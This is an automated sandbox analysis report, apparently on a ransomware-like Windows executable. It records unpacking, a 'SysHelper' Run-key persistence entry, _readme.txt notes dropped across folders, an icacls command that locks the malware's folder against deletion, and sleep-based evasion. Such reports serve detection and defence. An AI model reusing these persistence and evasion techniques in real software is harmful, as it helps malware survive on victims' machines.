          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\:\Users8 source: 66d5df681876c_file010924.exe, 00000007.00000003.1920725014.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1920436665.00000000039A8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ing source: 66d5df681876c_file010924.exe, 00000007.00000003.1414632632.0000000003014000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503426204.0000000003016000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414598195.0000000003009000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503810721.0000000003027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1895097511.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927368986.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925557469.00000000038E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Data\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1856221697.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856521488.0000000003519000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862785834.000000000352D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1407734481.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1407618047.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414663073.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1941309860.00000000037B1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\f source: 66d5df681876c_file010924.exe, 00000007.00000003.1503888368.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781997057.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1646227393.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781792022.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1840619727.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781457345.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781705167.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781997057.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840136245.0000000003515000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781558146.0000000003578000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782471207.0000000003010000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781792022.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\40m source: 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862690814.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926339843.0000000003AB6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.watzz/ source: 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862690814.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\X source: 66d5df681876c_file010924.exe, 00000007.00000003.1842736440.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898829486.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862690814.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1941365593.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\n\. source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927721951.00000000038AF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1940441236.000000000389F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: 66d5df681876c_file010924.exe, 00000007.00000003.1876772587.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897447370.0000000003BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: 66d5df681876c_file010924.exe, 00000007.00000003.1449273396.0000000003560000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1876772587.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926173964.0000000003525000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925928920.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1921818522.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1856221697.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856521488.0000000003519000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862785834.000000000352D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G[- source: 66d5df681876c_file010924.exe, 00000007.00000003.1921818522.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1928412478.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896722726.0000000003C68000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898391125.0000000003CB8000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897980412.0000000003C87000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\] source: 66d5df681876c_file010924.exe, 00000007.00000003.1862736852.00000000038D7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841840045.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862065132.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841612895.00000000038B7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1855268527.00000000038AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\> source: 66d5df681876c_file010924.exe, 00000007.00000003.1874024202.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873342035.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862419723.000000000358D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862505786.0000000003598000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874976893.00000000035C6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\he\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1781606614.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840342955.00000000034D4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeUnpacked PE file: 2.2.66d5df681876c_file010924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 12.2.66d5df681876c_file010924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 21.2.66d5df681876c_file010924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 25.2.66d5df681876c_file010924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 29.2.66d5df681876c_file010924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 33.2.66d5df681876c_file010924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeUnpacked PE file: 2.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 12.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 21.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 25.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 29.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 33.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00408E64 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00408E64
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00407005 push ecx; ret 0_2_00407018
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_022CC0AF push ecx; retf 0_2_022CC0B2
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_02388F05 push ecx; ret 0_2_02388F18
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_00407005 push ecx; ret 5_2_00407018
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_023420AF push ecx; retf 5_2_023420B2
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_02408F05 push ecx; ret 5_2_02408F18
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 6_2_023010AF push ecx; retf 6_2_023010B2
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 6_2_023B8F05 push ecx; ret 6_2_023B8F18
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D050 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D008 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D028 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D090 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D0A8 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D318 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050C4E0 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D550 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_00428565 push ecx; ret 12_2_00428578
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050D698 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050C960 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050C928 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050C988 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050C9A8 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050CB78 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050CD60 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050CDF0 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050CE58 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050CF28 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050CFC0 push eax; retn 004Dh12_2_0050D6B5
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0050CF90 push eax; retn 004Dh12_2_0050D6B5
          Source: 66d5df681876c_file010924.exeStatic PE information: section name: .text entropy: 7.924714226500883
          Source: 66d5df681876c_file010924.exe.2.drStatic PE information: section name: .text entropy: 7.924714226500883

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeJump to dropped file
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_022CA71C rdtsc 0_2_022CA71C
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,12_2_00481920
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,12_2_0040E670
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeThread delayed: delay time: 1100000Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45119
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exe TID: 7788Thread sleep time: -1100000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_0040F730
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_00410160
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,12_2_0040FB98
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00403626 GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,0_2_00403626
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeThread delayed: delay time: 1100000Jump to behavior
          Source: 66d5df681876c_file010924.exe, 00000002.00000003.1250134757.0000000000635000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000002.1252430363.0000000000635000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1251377452.0000000000635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
